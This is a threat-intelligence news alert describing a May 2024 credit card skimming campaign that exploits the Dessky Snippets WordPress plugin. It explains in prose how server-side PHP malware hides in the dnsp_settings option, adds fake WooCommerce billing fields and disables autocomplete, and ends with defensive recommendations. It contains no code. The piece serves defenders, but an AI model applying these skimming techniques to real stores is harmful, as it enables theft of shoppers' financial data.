Skip to content
Search
Close search
Menu
Home News Credit Card Data Harvesting via Exploited WordPress Plugin on E-Commerce Sites 

Overview

On May 11, 2024, Sucuri identified a newly observed Credit Card Data Harvesting campaign. The credit card skimming campaign is exploiting a vulnerability in the Dessky Snippets WordPress plugin to steal financial data from e-commerce websites.

Details of the Exploit:

  • Targeted Plugin: ‘Dessky Snippets’ (Over 200 active installations)
  • Malware Functionality: Attackers implant a server-side PHP credit card skimming malware into compromised sites, enabling the theft of financial data.
  • Malicious Code: The code is saved in the dnsp_settings option in the WordPress wp_options table and modifies the WooCommerce checkout process by injecting its own code into the billing form. This manipulation involves the addition of new fields to the billing form to request comprehensive credit card details, which are subsequently forwarded to a malicious URL. 
  • Impact: Theft of credit card details entered during checkout on WooCommerce websites.

Attack Methodology

  • Initial Access: Gained through known vulnerabilities in WordPress or easily guessable credentials.
  • Post-Exploitation Actions: Attackers install additional plugins, both legitimate and malicious, similar to the one exploited in this campaign.
  • Obfuscation Techniques: Includes disabling the autocomplete attribute. Disabling this attribute on the counterfeit checkout form reduces the likelihood of the user’s browser alerting them to the entry of sensitive information, lowering user suspicion.

Recommendations:

  • Update Sites and Plugins: WordPress site owners, particularly those with E-Commerce functionalities, are advised to update their sites and plugins to the latest versions.
  • Use Robust Passwords: Employ strong, unique passwords to prevent brute force attacks.
  • Regular Monitoring: Routinely check sites for any unauthorised modifications or signs of malware.

By taking these actions, WordPress site owners can better protect their sites from this emerging threat and safeguard their users’ financial data.

29.05.24
Threat Intelligence Alerts
Jake Mills
Written by
Jake Mills
Ethical Hacker

Related articles